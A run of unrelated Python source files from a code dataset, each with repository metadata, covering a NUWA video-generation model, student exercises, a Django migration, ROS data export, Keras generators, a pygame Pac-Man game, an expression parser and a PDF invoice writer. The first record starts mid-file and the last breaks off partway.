(max_video_frames, fmap_size, fmap_size)\n\n self.video_pos_emb = AxialPositionalEmbedding(dim, shape = video_shape)\n\n # cycle dilation for sparse 3d-nearby attention\n\n cross_2dna_dilations = tuple(range(1, cross_2dna_dilation + 1)) if not isinstance(cross_2dna_dilation, (list, tuple)) else cross_2dna_dilation\n dec_transformer_klass = Transformer if not dec_reversible else ReversibleTransformer\n\n self.video_transformer = dec_transformer_klass(\n dim = dim,\n depth = dec_depth,\n heads = dec_heads,\n dim_head = dec_dim_head,\n causal = True,\n cross_attend = True,\n cross_2dna_attn = True,\n cross_2dna_image_size = fmap_size,\n cross_2dna_kernel_size = cross_2dna_kernel_size,\n cross_2dna_dilations = cross_2dna_dilations,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n ff_chunk_size = ff_chunk_size,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = video_shape,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk,\n sparse_3dna_attn = True\n )\n\n self.to_logits = nn.Linear(dim, num_image_tokens)\n\n def embed_sketch(self, sketch, mask = None):\n batch, frames, channels, image_size, _, device = *sketch.shape, sketch.device\n\n if exists(mask):\n assert mask.shape[:2] == (batch, frames), 'sketch mask must be in shape of (batch x frame)'\n\n sketch_indices = self.sketch_vae.get_video_indices(sketch)\n sketch_indices = rearrange(sketch_indices, 'b ... -> b (...)')\n sketch_tokens = self.sketch_embedding(sketch_indices)\n\n num_tokens = sketch_tokens.shape[1]\n\n sketch_pos_emb = self.sketch_pos_emb()\n sketch_pos_emb = sketch_pos_emb[:, :num_tokens]\n\n sketch_tokens = sketch_tokens + sketch_pos_emb\n\n if exists(mask):\n mask = repeat(mask, 'b f -> b (f n)', n = (num_tokens // frames))\n else:\n mask = torch.ones((batch, num_tokens), dtype = torch.bool, device = device)\n\n embed = self.sketch_transformer(sketch_tokens, mask = mask)\n return embed, mask\n\n @torch.no_grad()\n @eval_decorator\n def generate(\n self,\n *,\n sketch,\n sketch_mask = None,\n filter_thres = 0.9,\n temperature = 1.,\n decode_max_batchsize = 10,\n cond_scale = 2.,\n num_frames = None\n ):\n batch, device = sketch.shape[0], sketch.device\n\n sketch_embeds, decoder_context_mask = self.embed_sketch(sketch, mask = sketch_mask)\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n\n video_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n\n num_tokens_per_frame = self.video_fmap_size ** 2\n\n num_frames = default(num_frames, self.max_video_frames)\n total_video_tokens = num_tokens_per_frame * num_frames\n max_video_tokens = num_tokens_per_frame * self.max_video_frames\n\n pos_emb = self.video_pos_emb()\n\n for ind in range(total_video_tokens):\n video_indices_input = video_indices\n\n num_video_tokens = video_indices.shape[1]\n if num_video_tokens > max_video_tokens:\n curr_frame_tokens = num_video_tokens % num_tokens_per_frame\n lookback_tokens = (self.max_video_frames - (0 if curr_frame_tokens == 0 else 1)) * num_tokens_per_frame + curr_frame_tokens\n video_indices_input = video_indices[:, -lookback_tokens:]\n\n frame_embeddings = self.image_embedding(video_indices_input)\n frame_embeddings = pos_emb[:, :frame_embeddings.shape[1]] + frame_embeddings\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = sketch_embeds,\n context_mask = decoder_context_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if cond_scale != 1:\n # discovery by Katherine Crowson\n # https://twitter.com/RiversHaveWings/status/1478093658716966912\n uncond_frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = sketch_embeds,\n context_mask = torch.zeros_like(decoder_context_mask).bool()\n )\n\n uncond_logits = self.to_logits(uncond_frame_embeddings)\n logits = uncond_logits + (logits - uncond_logits) * cond_scale\n\n logits = logits[:, -1, :]\n\n filtered_logits = top_k(logits, thres = filter_thres)\n sample = gumbel_sample(filtered_logits, temperature = temperature, dim = -1)\n sample = rearrange(sample, 'b -> b 1')\n video_indices = torch.cat((video_indices, sample), dim = 1)\n\n codes = self.vae.codebook[video_indices]\n codes = rearrange(codes, 'b (f h w) d -> (b f) d h w', h = self.video_fmap_size, w = self.video_fmap_size)\n\n image_reconstructions = batch_process(codes, self.vae.decode, chunks = decode_max_batchsize)\n video = rearrange(image_reconstructions, '(b f) d h w -> b f d h w', b = batch)\n return video\n\n def forward(\n self,\n *,\n sketch,\n sketch_mask = None,\n video = None,\n return_loss = False,\n cond_dropout_prob = 0.2\n ):\n # handle one sketch gracefully\n\n if sketch.ndim == 4:\n sketch = rearrange(sketch, 'b c h w -> b 1 c h w')\n\n # get a bunch of variables\n\n batch, sketch_frames, sketch_channels, sketch_image_size, _, frames, device = *sketch.shape, video.shape[1], sketch.device\n\n # guardrails\n\n assert sketch_image_size == self.image_size, 'sketch image size must be equal'\n assert sketch_frames <= self.sketch_max_video_frames, 'sketch frames must be less than max sketch video frames'\n\n # get sketch embeddings, and calculate mask (for now, assume no padding)\n\n sketch_embeds, decoder_context_mask = self.embed_sketch(sketch, mask = sketch_mask)\n\n assert frames == self.max_video_frames, f'you must give the full video frames ({self.max_video_frames}) during training'\n\n frame_indices = self.vae.get_video_indices(video)\n frame_indices = rearrange(frame_indices, 'b ... -> b (...)')\n frame_indices_input = frame_indices[:, :-1] if return_loss else frame_indices\n\n frame_embeddings = self.image_embedding(frame_indices_input)\n frame_embeddings = self.video_pos_emb()[:, :-1] + frame_embeddings\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n if self.training and cond_dropout_prob > 0:\n # dropout condition randomly\n # presented in https://openreview.net/forum?id=qw8AKxfYbI\n uncond_mask = prob_mask_like((batch,), cond_dropout_prob, device = device)\n sketch_mask *= rearrange(~uncond_mask, 'b -> b 1')\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = sketch_embeds,\n context_mask = decoder_context_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if not return_loss:\n return logits\n\n loss = F.cross_entropy(rearrange(logits, 'b n c -> b c n'), frame_indices)\n return loss\n","repo_name":"gmyofustc/nuwa-pytorch","sub_path":"nuwa_pytorch/nuwa_pytorch.py","file_name":"nuwa_pytorch.py","file_ext":"py","file_size_in_byte":94793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"18283912209","text":"# В текстовый файл построчно записаны фамилия и имя каждого учащегося класса и их оценка за контрольную.\n# Вывести на экран всех учащихся, чья оценка меньше 3 баллов, и посчитать средний балл по классу.\nf = 'spisok.txt'\nwith open(f, encoding='utf8') as content:\n content = content.read()\ncontent = content.split(\"\\n\")\nstudents = []\nfor line in content:\n line = line.split(\" \")\n students.append([line[0], line[1], int(line[2])])\nsr = 0\nprint(\"Ниже 3 баллов:\")\nfor s in students:\n sr += int(s[2])\n if s[2] < 3:\n print(f\"{s[0]} {s[1]}: {s[2]}\")\nsr/= len(students)\nprint(f\"Средняя оценка по классу: {sr}\")\n\n#Создать текстовый файл, записать в него построчно данные, которые вводит пользователь.\n# Окончанием ввода пусть служит пустая строка.\nfilename = 'text.txt'\nf = open(filename,'w')\ni = 0\nwhile True:\n s = input('Введите строку '+str(i+1)+': ')\n i += 1\n if s == '': break\n f.write(s+'\\n')\nf.close()\nwith open(filename, 'r') as file:\n for s in file:\n print(s, end='')","repo_name":"AliceMonte/lesson1","sub_path":"lesson 21.py","file_name":"lesson 21.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70934841094","text":"# -*- coding: utf-8 -*-\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pages', '0002_page_requires_authentication'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='page',\n name='hide_from_anonymous',\n field=models.BooleanField(default=False, help_text=\"Hide this link from users that aren't logged in\"),\n ),\n ]\n","repo_name":"onespacemedia/cms","sub_path":"cms/apps/pages/migrations/0003_page_hide_from_anonymous.py","file_name":"0003_page_hide_from_anonymous.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"44"} +{"seq_id":"28142027833","text":"import cv2\nimport numpy as np\nfrom .color_classes import color_classes\n\ndef img_to_npy(input_path, out_path):\n # Učitavanje slike za trening i legende\n slo_image = cv2.imread(input_path)\n\n # Inicijalizacija matrice za čuvanje rezultata\n out_slo = np.zeros((slo_image.shape[0], slo_image.shape[1]), dtype=np.uint8)\n\n # Pretraživanje slike za trening i mapiranje boja na klase\n for i in range(slo_image.shape[0]):\n for j in range(slo_image.shape[1]):\n color_temp = tuple(slo_image[i, j])\n color = set(color_temp)\n for key in color_classes.keys():\n key = set(key)\n if color == key:\n out_slo[i, j] = map_values_to_key(color, color_classes)\n\n # Čuvanje rezultujuće matrice\n save(out_path, out_slo)\n\n\ndef save(out_path, out_npy):\n out_npy = out_npy.astype(int)\n np.save(out_path, out_npy)\n\n\ndef map_values_to_key(my_set, color_classes):\n for key, value in color_classes.items():\n if set(key) == my_set:\n return value\n return None","repo_name":"Obradowski1389/HSA_DataScience_ML","sub_path":"scripts/img_to_npy.py","file_name":"img_to_npy.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"16046125505","text":"import sys, os\nimport argparse\n\nimport numpy as np\nimport rosbag\n\nsys.path.append(os.path.join(os.getcwd(), \"pyutils\"))\nimport to_json\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-bagfile', required=True)\nparser.add_argument('-motiontopic', default='/xivo/fullstate')\nparser.add_argument('-maptopic', default='/xivo/map')\nparser.add_argument('-dataset', default='tumvi')\nparser.add_argument('-seq', default='room1')\nparser.add_argument('-sen', default='tango_top')\nparser.add_argument('-cam_id', default=0, type=int)\n\n\n\ndef rosvec_to_list(rosvec):\n return [ rosvec.x, rosvec.y, rosvec.z ]\n\ndef rosquat_to_list(rosquat):\n return [ rosquat.w, rosquat.x, rosquat.y, rosquat.z ]\n\n\ndef roslist_to_list(roslist, length):\n out = []\n for i in range(length):\n out.append(roslist[i])\n return out\n\n\ndef main(bagfilename, motiontopic, maptopic, output_file):\n bagfile = rosbag.Bag(bagfilename, mode='r')\n\n # data structure that maps timestamp to a dictionary\n alltimesteps = {}\n\n # parse fullstate topic\n for _,msg,_ in bagfile.read_messages(topics=motiontopic):\n entry = {}\n\n ts = msg.header.stamp.secs*1000000000 + msg.header.stamp.nsecs\n\n entry['group'] = msg.group\n\n entry['ImagePath'] = ''\n entry['Timestamp'] = ts\n entry['Tsb_XYZ'] = rosvec_to_list(msg.gsb.translation)\n entry['qsb_WXYZ'] = rosquat_to_list(msg.gsb.rotation)\n entry['Tbc_XYZ'] = rosvec_to_list(msg.gbc.translation)\n entry['qbc_WXYZ'] = rosquat_to_list(msg.gbc.rotation)\n entry['Tsc_XYZ'] = rosvec_to_list(msg.gsc.translation)\n entry['qsc_WXYZ'] = rosquat_to_list(msg.gsc.rotation)\n entry['Vsb_XYZ'] = rosvec_to_list(msg.Vsb)\n\n entry['Pstate'] = [ msg.MotionStateSize, list(msg.covariance) ]\n\n entry['MeasurementUpdateInitialized'] = bool(msg.MeasurementUpdateInitialized)\n entry['inn_Tsb'] = rosvec_to_list(msg.inn_Tsb)\n entry['inn_Wsb'] = rosvec_to_list(msg.inn_Wsb)\n entry['inn_Vsb'] = rosvec_to_list(msg.inn_Vsb)\n\n entry['bg'] = rosvec_to_list(msg.bg)\n entry['ba'] = rosvec_to_list(msg.ba)\n entry['qg_WXYZ'] = rosquat_to_list(msg.qg)\n entry['td'] = msg.td\n entry['Ca'] = list(msg.Ca)\n entry['Cg'] = list(msg.Cg)\n\n alltimesteps[ts] = entry\n\n # Parse map topic\n for _,msg,_ in bagfile.read_messages(topics=maptopic):\n\n ts = msg.header.stamp.secs*1000000000 + msg.header.stamp.nsecs\n\n entry = alltimesteps[ts]\n\n feature_positions = []\n feature_ids = []\n feature_covariances = []\n\n for feature in msg.features:\n feature_ids.append(feature.id)\n feature_positions.extend(rosvec_to_list(feature.Xs))\n\n cov = roslist_to_list(feature.covariance, 9)\n feature_covariances.extend([cov[0], cov[1], cov[2], cov[4], cov[5], cov[8]])\n\n entry['num_instate_features'] = msg.num_features\n entry['feature_positions'] = feature_positions\n entry['feature_covs'] = feature_covariances\n entry['feature_ids'] = feature_ids\n\n alltimesteps[ts] = entry\n\n # sort timestamps\n timestamps = alltimesteps.keys()\n timestamps.sort()\n\n # create list of dictionaries\n final_list = []\n for ts in timestamps:\n final_list.append(alltimesteps[ts])\n\n json_string = to_json.to_json(final_list)\n with open(output_file, 'w') as fid:\n fid.write(json_string)\n\n\n\nif __name__==\"__main__\":\n args = parser.parse_args()\n\n if args.dataset==\"tumvi\":\n output_filename = \"tumvi_{}_cam{}\".format(args.seq, args.cam_id)\n elif args.dataset==\"cosyvio\":\n output_filename = \"cosyvio_{}_{}\".format(args.sen, args.seq)\n else:\n output_filename = \"{}_{}\".format(args.dataset, args.seq)\n\n main(args.bagfile, args.motiontopic, args.maptopic, output_filename)\n","repo_name":"stephanietsuei/learned-uncertainty-calibration","sub_path":"run/xivo/rosbag_to_json.py","file_name":"rosbag_to_json.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"44"} +{"seq_id":"72288270852","text":"class Solution(object):\n\n def getId(self, x, w):\n if x < 0:\n return (x+1)/w - 1\n else:\n return x/w\n \n def containsNearbyAlmostDuplicate(self, nums, k, t):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :type t: int\n :rtype: bool\n \"\"\"\n if t < 0: return False\n dic = {}\n w = t+1\n for i in range(len(nums)):\n idd = self.getId(nums[i], w)\n if idd in dic:\n return True\n if idd-1 in dic and abs(nums[i] - dic[idd-1]) < w:\n return True\n if idd+1 in dic and abs(nums[i] - dic[idd+1]) < w:\n return True\n dic[idd] = nums[i]\n if i>= k: del dic[self.getId(nums[i-k],w)]\n return False","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/220-Contains-Duplicate-III/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23323121485","text":"N, K = map(int, input().split())\r\nstr = input()\r\n\r\nlastH = -1\r\nresult = 0\r\nfor i in range(N):\r\n if str[i] == 'P':\r\n mostLeft = max(0, i-K, lastH)\r\n mostRight = min(N-1, i+K)\r\n for j in range(mostLeft, mostRight+1):\r\n if str[j] == 'H' and j != lastH:\r\n lastH = j\r\n result += 1\r\n break \r\n\r\nprint(result)","repo_name":"JeonghyeonK/python-algorithm","sub_path":"대기업 코테 유형 모음/19941.py","file_name":"19941.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32624872574","text":"import os\n\nimport numpy as np\n\nfrom tensorflow.keras.utils import Sequence\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom imageio import imread\nfrom scipy.special import expit\nfrom skimage.transform import resize\n\n\nclass SegmentationSequence(Sequence):\n\n def __init__(self, images, masks, batch_size, jitter=False):\n self.masks = masks\n self.images = images\n self.batch_size = batch_size\n self.shuffled_indices = np.random.permutation(self.images.shape[0])\n self.jitter = jitter\n if self.jitter:\n self.jitter_datagen = ImageDataGenerator(rotation_range=5,\n width_shift_range=0.05,\n height_shift_range=0.05,\n fill_mode=\"nearest\")\n\n def __len__(self):\n return self.images.shape[0] // self.batch_size\n\n def __getitem__(self, idx):\n\n # The shuffled indices in this batch\n batch_inds = self.shuffled_indices[idx * self.batch_size : (idx + 1) * self.batch_size]\n\n if self.jitter:\n\n batch_images_list = []\n batch_masks_list = []\n\n for i in batch_inds:\n # Stack mask and image together to ensure that they are transformed\n # in exactly the same way\n stacked = np.dstack([self.images[i, :, :, :].astype(np.uint8), self.masks[i, :, :, :]])\n transformed = self.jitter_datagen.random_transform(stacked)\n\n batch_images_list.append(transformed[:, :, 0].astype(float))\n batch_masks_list.append(transformed[:, :, 1])\n\n batch_images = np.dstack(batch_images_list)\n batch_images = np.transpose(batch_images[:, :, :, np.newaxis], [2, 0, 1, 3])\n batch_masks = np.dstack(batch_masks_list)\n batch_masks = np.transpose(batch_masks[:, :, :, np.newaxis], [2, 0, 1, 3])\n\n else:\n\n # Slice images and labels for this batch\n batch_images = self.images[ batch_inds, :, :, :]\n batch_masks = self.masks[ batch_inds, :, :, :]\n\n return (batch_images, batch_masks)\n\n def on_epoch_end(self):\n # Shuffle the dataset indices again\n self.shuffled_indices = np.random.permutation(self.images.shape[0])\n\n\nclass SliceSelectionSequence(Sequence):\n\n def __init__(self, labels, image_dir, batch_size, batches_per_epoch,\n jitter=False, sigmoid_scale=None):\n self.labels = labels\n self.image_dir = image_dir\n self.batch_size = batch_size\n self.batches_per_epoch = batches_per_epoch\n self.jitter = jitter\n self.sigmoid_scale = sigmoid_scale\n self.shuffled_indices = np.random.permutation(len(labels))\n if self.jitter:\n self.jitter_datagen = ImageDataGenerator(rotation_range=5,\n width_shift_range=0.05,\n height_shift_range=0.05,\n fill_mode=\"constant\",\n cval=0)\n\n def __len__(self):\n return self.batches_per_epoch\n\n def __getitem__(self, idx):\n\n # The shuffled indices in this batch\n batch_inds = self.shuffled_indices[idx * self.batch_size: (idx + 1) * self.batch_size]\n\n # Labels for this batch\n batch_labels = self.labels[batch_inds]\n\n # Soft-threshold the distances using a sigmoid\n if self.sigmoid_scale is not None:\n batch_labels = expit(batch_labels / self.sigmoid_scale)\n\n # The images for this batch\n images_list = []\n for i in batch_inds:\n\n # Load in image\n filename = os.path.join(self.image_dir, str(i).zfill(6) + '.png')\n im = resize(imread(filename), (256, 256), mode='constant',\n preserve_range=True, anti_aliasing=True)[:, :, np.newaxis]\n\n # Apply random jitter (rotation, shift, zoom)\n if self.jitter:\n im = self.jitter_datagen.random_transform(im)\n\n images_list.append(im)\n\n batch_images = np.dstack(images_list).astype(float)\n batch_images = np.transpose(batch_images[:, :, :, np.newaxis], [2, 0, 1, 3])\n\n return (batch_images, batch_labels)\n\n def on_epoch_end(self):\n # Shuffle the dataset indices again\n required = self.batches_per_epoch * self.batch_size\n use_replacement = required > len(self.labels)\n self.shuffled_indices = np.random.choice(len(self.labels), required, replace=use_replacement)\n","repo_name":"CPBridge/ct_body_composition","sub_path":"body_comp/train/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"44"} +{"seq_id":"28199838543","text":"import Characters\nimport pygame\nimport yaml\n\n\nwith open('Configuration.yaml', 'r') as yamlConfig:\n config = yaml.load(yamlConfig, Loader=yaml.FullLoader)\n\nk_adapter = config['window_config']['window_images_adapter']\nk_black = config['colors']['black']\nk_blue = config['colors']['blue']\nk_column = config['window_config']['column_number']\nk_fps = config['FPS']\nk_height = config['window_config']['height']\nk_movement = config['movement']\nk_row = config['window_config']['row_number']\nk_width = config['window_config']['width']\n\nk_sources = config['src']\n\nwith open(k_sources['map'], 'r') as maze_file:\n k_maze = maze_file.readlines()\n\n\ndef game_state_draw(maze, player, size_x, size_y, window):\n y = 0\n\n for row in maze:\n x = 0\n for item in row:\n if item == '0':\n pygame.draw.rect(window, (k_black['red'], k_black['green'], k_black['blue']), pygame.Rect(x, y, size_x,\n size_y))\n if item == '1':\n pygame.draw.rect(window, (k_blue['red'], k_blue['green'], k_blue['blue']), pygame.Rect(x, y, size_x,\n size_y))\n x += size_x\n y += size_y\n\n window.blit(pygame.transform.scale(pygame.image.load(player.get_image()), (player.get_size_x(), player.get_size_y())\n ), (player.get_x(), player.get_y()))\n\n pygame.display.update()\n\n\ndef __main__():\n run = True\n\n size_x = (k_width//k_row)\n size_y = (k_height//k_column)\n\n character_x = (k_width//2) - (2 * size_x)\n character_y = 0\n while character_y < k_height/2:\n character_y += size_y\n\n pygame.init()\n pygame.Surface((k_width - (k_width - size_x * k_row), k_height - (k_height - size_y * k_column)))\n window = pygame.display.set_mode((k_width - (k_width - size_x * k_row), k_height - (k_height - size_y * k_column)))\n pygame.display.set_caption('PUC-MAN')\n\n k_clock = pygame.time.Clock()\n\n player = Characters.Player(k_sources['images']['player']['left'], character_x, character_y, (size_x * k_adapter),\n (size_y * k_adapter), k_maze, k_movement, k_row, k_column, k_adapter)\n player.start()\n\n while run:\n k_clock.tick(k_fps)\n\n game_state_draw(k_maze, player, size_x, size_y, window)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n player.set_run(False)\n\n key_pressed = pygame.key.get_pressed()\n if key_pressed[pygame.K_DOWN]:\n player.set_direction(player.get_down())\n player.set_image(k_sources['images']['player']['down'])\n if key_pressed[pygame.K_LEFT]:\n player.set_direction(player.get_left())\n player.set_image(k_sources['images']['player']['left'])\n if key_pressed[pygame.K_RIGHT]:\n player.set_direction(player.get_right())\n player.set_image(k_sources['images']['player']['right'])\n if key_pressed[pygame.K_UP]:\n player.set_direction(player.get_up())\n player.set_image(k_sources['images']['player']['up'])\n\n pygame.display.update()\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n __main__()\n","repo_name":"Vikuzo/Pycman","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24340172829","text":"import operator\nfrom collections import deque\nfrom enum import Enum\n\nOPEN_BRACKET = '('\nCLOSE_BRACKET = ')'\nPLUS, MINUS, MUL = '+', '-', '*'\n\n\nclass NamedFunction:\n def __init__(self, name, op):\n self.name = name\n self.op = op\n\n def __call__(self, *args, **kwargs):\n return self.op(*args, **kwargs)\n\n\nFUNCTIONS = [NamedFunction('Podarok', lambda x: x + 5 if x > 0 else abs(x))]\n\n\nclass ParseException(Exception):\n pass\n\n\nclass TokenType(Enum):\n OPERATOR = 0\n BRACKET = 1\n NUMBER = 2\n STRING = 3\n FUNCTIONS = 4\n END = 5\n\n\nclass Token:\n BRACKETS = {OPEN_BRACKET, CLOSE_BRACKET}\n OPERATORS_MAP = {PLUS: operator.add, MINUS: operator.sub, MUL: operator.mul}\n FUNCTIONS_MAP = {fun.name: fun for fun in FUNCTIONS}\n CONST = {'Ded Moroz': 2020, 'Moroz': -30, 'Snegurochka': 10}\n END = '.'\n\n def __init__(self, token_type: TokenType, value, op=None):\n self.token_type = token_type\n self.value = value\n self.op = op\n\n @staticmethod\n def parse(value):\n if value == Token.END:\n return Token(TokenType.END, value)\n if value in Token.BRACKETS:\n return Token(TokenType.BRACKET, value)\n if value in Token.OPERATORS_MAP:\n return Token(TokenType.OPERATOR, value, Token.OPERATORS_MAP[value])\n try:\n int_value = int(value)\n return Token(TokenType.NUMBER, int_value)\n except ValueError:\n return Token(TokenType.STRING, value)\n\n def __str__(self):\n return str(self.value)\n\n\nclass Lexer:\n def __init__(self, string):\n self.string = string\n self.cur_pos = 0\n self.last_pos = deque()\n\n def is_end(self):\n return self.cur_pos == len(self.string)\n\n def revert(self):\n self.cur_pos = self.last_pos.pop()\n\n def _try_parse_chars(self, chars):\n chars = ''.join(chars)\n if chars in Token.CONST:\n return Token(TokenType.NUMBER, Token.CONST[chars])\n if chars in Token.FUNCTIONS_MAP:\n return Token(TokenType.FUNCTIONS, chars, Token.FUNCTIONS_MAP[chars])\n try:\n int_value = int(chars)\n return Token(TokenType.NUMBER, int_value)\n except:\n raise ParseException()\n\n def next_token(self):\n cur_pos = self.cur_pos\n self.last_pos.append(cur_pos)\n if self.is_end():\n raise ParseException()\n chars = []\n has_number = False\n has_char = False\n while cur_pos < len(self.string):\n cur_char = self.string[cur_pos]\n cur_token = Token.parse(cur_char)\n\n is_number = cur_token.token_type == TokenType.NUMBER\n is_char = cur_token.token_type == TokenType.STRING\n is_not_const = not is_number and not is_char\n\n has_char = has_char or is_char\n has_number = has_number or is_number\n\n if is_not_const and len(chars) == 0:\n self.cur_pos = cur_pos + 1\n return cur_token\n\n if (is_char and has_number) or (is_number and has_char) or (is_not_const and len(chars) > 0):\n self.cur_pos = cur_pos\n return self._try_parse_chars(chars)\n\n if not is_not_const:\n cur_pos += 1\n chars.append(cur_char)\n else:\n raise ParseException()\n self.cur_pos = cur_pos\n return Token.parse(''.join(chars))\n\n\nclass Parser:\n def __init__(self, string):\n self.lexer = Lexer(string)\n\n def inner_parse_fun(self, fun_token):\n open_bracket = self.lexer.next_token()\n if open_bracket.value != OPEN_BRACKET:\n raise ParseException()\n argument = self.parse_additive()\n close_bracket = self.lexer.next_token()\n if close_bracket.value != CLOSE_BRACKET:\n raise ParseException()\n return Token(TokenType.NUMBER, fun_token.op(argument.value))\n\n def parse_operand(self):\n token = self.lexer.next_token()\n if token.value == OPEN_BRACKET:\n res = self.parse_additive()\n token2 = self.lexer.next_token()\n if token2.value != CLOSE_BRACKET:\n raise ParseException()\n return res\n if token.token_type == TokenType.NUMBER:\n return Token(TokenType.NUMBER, token.value)\n if token.token_type == TokenType.FUNCTIONS:\n return self.inner_parse_fun(token)\n raise ParseException()\n\n def parse_mult(self):\n first = self.parse_operand()\n while not self.lexer.is_end():\n op = self.lexer.next_token()\n if op.value != MUL:\n self.lexer.revert()\n break\n second = self.parse_operand()\n first = Token(TokenType.NUMBER, op.op(first.value, second.value))\n return first\n\n def parse_additive(self):\n operand1 = self.parse_mult()\n while not self.lexer.is_end():\n op = self.lexer.next_token()\n if op.value not in {PLUS, MINUS}:\n self.lexer.revert()\n break\n operand2 = self.parse_mult()\n operand1 = Token(TokenType.NUMBER, op.op(operand1.value, operand2.value))\n return operand1\n\n def parse(self):\n expr = self.parse_additive()\n if self.lexer.next_token().token_type != TokenType.END:\n raise ParseException()\n return expr\n\n\nif __name__ == '__main__':\n s = input()\n parser = Parser(s)\n try:\n print(parser.parse())\n except ParseException:\n print('WRONG')","repo_name":"godays/algorithm-and-data-structures","sub_path":"15. Парсинг/С. Новогоднее выражение.py","file_name":"С. Новогоднее выражение.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1946837346","text":"'''Creates PDF files.\n\nWrites 3 different types of PDFs:\n1. Picking list\n2. Packaging list\n3. Address label\n'''\nfrom fpdf import FPDF\nfrom .constants import SENDER_DETAILS\n\n\nclass Pdf:\n '''Uses FPDF library to create PDF files.'''\n\n def __init__(self):\n self._document = None\n self._effective_width = None\n self._column_width = None\n self._text_height = None\n\n def _create_page(self):\n # Initialising here rather than in constructor because some methods\n # are invoked iteratively, so need to create a new page each time.\n self._document = FPDF(format='A4', orientation='L', unit='in')\n self._document.add_page()\n self._document.set_font('Arial', '', 14)\n self._effective_width = self._document.w - 2 * self._document.l_margin\n self._column_width = self._effective_width / 6\n self._text_height = self._document.font_size\n\n def _set_text_style(self, index):\n # Sets font and size. Sets to bold if index\n # is 0 for heading style.\n if index == 0:\n self._document.set_font('Arial', 'B', 11)\n self._document.set_fill_color(230, 230, 230)\n else:\n self._document.set_font('Arial', '', 10)\n self._document.set_fill_color(255, 255, 255)\n\n def _create_table(self, data):\n for index, row in enumerate(data):\n self._set_text_style(index)\n for item in row:\n item = str(item)\n # Styling for header row.\n if index == 0:\n item.replace('_', ' ')\n item.capitalize()\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item),\n border=1, fill=True)\n self._document.ln(self._text_height * 2)\n\n def write_picking_list(self, data, destination):\n '''Creates a PDF file with a table of all data passed.\n\n Args:\n data: a list with a list for each row to be written\n (all items strings).\n destination: folder path to write file to.\n\n Raises:\n Exception: an error in outputting the file.\n '''\n self._create_page()\n # Writing title.\n self._document.set_font('Arial', 'B', 18)\n self._document.cell(self._effective_width, 0.0,\n 'Picking List', align='C')\n\n self._document.set_font('Arial', '', 12)\n self._document.ln(0.5)\n self._create_table(data)\n file_name = destination + '/Picking List.pdf'\n try:\n self._document.output(name=file_name, dest='F')\n except Exception as e:\n print(\"There was an error - have you already got a file called\"\n \" Picking List.pdf open?\")\n\n def write_packaging_list(\n self,\n date,\n address,\n items,\n order_id,\n destination\n ):\n '''Creates PDF file with:\n Sender address\n Customer address\n Table of ordered items\n\n Args:\n date: string of order date.\n address: a list of address details with a list for each line.\n items: a list of items and quantities with a list for each item.\n order_id: integer id of order.\n destination: folder path to write files to.\n '''\n self._create_page()\n self._document.set_x(-30)\n\n # Write sender details.\n for index, item in enumerate(SENDER_DETAILS):\n self._set_text_style(index)\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item), border=0)\n self._document.ln(self._text_height * 1.5)\n\n # Write invoice number and order date.\n self._document.ln(0.5)\n self._document.cell(\n self._column_width, 2 * self._text_height, 'Invoice No. xxxxxxxx\"\\\n \" Date: ' + date,\n border=0)\n self._document.ln(0.5)\n\n # Write customer address.\n for index, item in enumerate(address):\n self._set_text_style(index)\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item), border=0)\n self._document.ln(self._text_height * 1.5)\n\n # Write table of ordered items.\n self._document.set_font('Arial', '', 12)\n self._document.ln(self._text_height * 2.5)\n self._create_table(items)\n\n file_name = destination + '/Packaging List ' + \\\n address[1] + ' ' + str(order_id) + '.pdf'\n self._document.output(name=file_name, dest='F')\n\n def write_address_label(self, address, order_id, destination):\n '''Write PDF file containing customer name and address.\n\n 